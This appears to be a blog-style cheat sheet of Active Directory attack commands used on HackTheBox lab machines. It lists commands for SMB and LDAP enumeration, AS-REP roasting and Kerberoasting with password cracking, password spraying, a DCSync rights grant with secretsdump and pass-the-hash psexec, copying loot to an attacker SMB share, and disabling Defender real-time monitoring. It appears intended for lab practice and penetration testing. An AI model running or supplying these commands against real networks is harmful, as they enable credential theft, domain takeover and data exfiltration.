Initial access

SMB Enumeration

smbmap -H 10.10.10.100
smbmap -H 10.10.10.100 -R # recursive
smbmap -H 10.10.10.192 -u null
smbmap -H 10.10.10.100 -d domain.local -u USERNAME -p PASSWORD

smbclient  \\\\10.10.10.169\\NETLOGON -U 'melanie'%'Welcome123!'

If access on GPO Policies search for cpasswords in "domain.local/Policies/{xx-xx-xx}/MACHINE/Preferences/Groups/Groups.xml" and decrypt with

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

ASREPRoast

Finding users that don't require preauth.
We can send an AS_REQ to the DC and get the original user key as a response. We can use this to crack the password

python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip=10.10.10.161 -format hashcat -outputfile hash
hashcat -m 18200 --force -a 0 hash /usr/share/wordlists/rockyou.txt

Kerberoast

python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -outputfile hashes
john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs

enum4linux

enum4linux -a 10.10.10.175

Rpcclient

rpcclient -U "" -N 10.10.10.169
enumdomusers
querydispinfo

ldapsearch

ldapsearch -H ldap://EGOTISTICAL-BANK.LOCAL:389/ -x -s base -b '' "(objectClass=*)" "*" +

ldapdomaindump

ldapdomaindump -u 'domain.local\user' -p PASSWORD 10.10.10.103 -o ldap/
ldapdomaindump ldap://10.10.10.100:389 -u 'domain.local\user' -p 'PASSWORD' -at SIMPLE

DNS enumeration

dig srv _ldap._tcp.dc._msdcs.DOMAIN.LOCAL @10.10.10.175

kerbrute

kerbrute userenum -d domain.LOCAL xato-net-10-million-usernames.txt --dc 10.10.10.175

Password enumeration

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.175 ldap2 -V -f
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success

Privesc

Enumeration tools

winpeas
privesccheck

Change passwords of users with higher privileges

rpcclient //site.dom.local -U dom.local/USERNAME%PASSWORD
setuserinfo2 username 23 password

DCSync attack

(requires access to server)
Get groups that allow you to set DCSync permissions using powerview

Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')} | foreach{get-adobject -identity $_.SecurityIdentifier}
net group "Exchange Windows Permissions" xnull /add /domain
$pass = convertto-securestring 'password-1234' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\xnull', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "xnull" -Rights DCSync

Then remotely:

python3 secretsdump.py xnull:password-1234@10.10.10.161
python3 psexec.py forest.htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Exfiltration

SMB Server

on attacker machine

smbserver.py share . -smb2support -username xnull -password xnull

On victim machine

net use \\10.10.14.6\share /u:xnull xnull
copy 20191018035324_BloodHound.zip \\10.10.14.6\share\

AV Bypass

Disable

Set-MpPreference -DisableRealtimeMonitoring $true

Exclusion paths

 Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
Last modified: November 5, 2022

Author

Comments

Write a Reply or Comment

Your email address will not be published.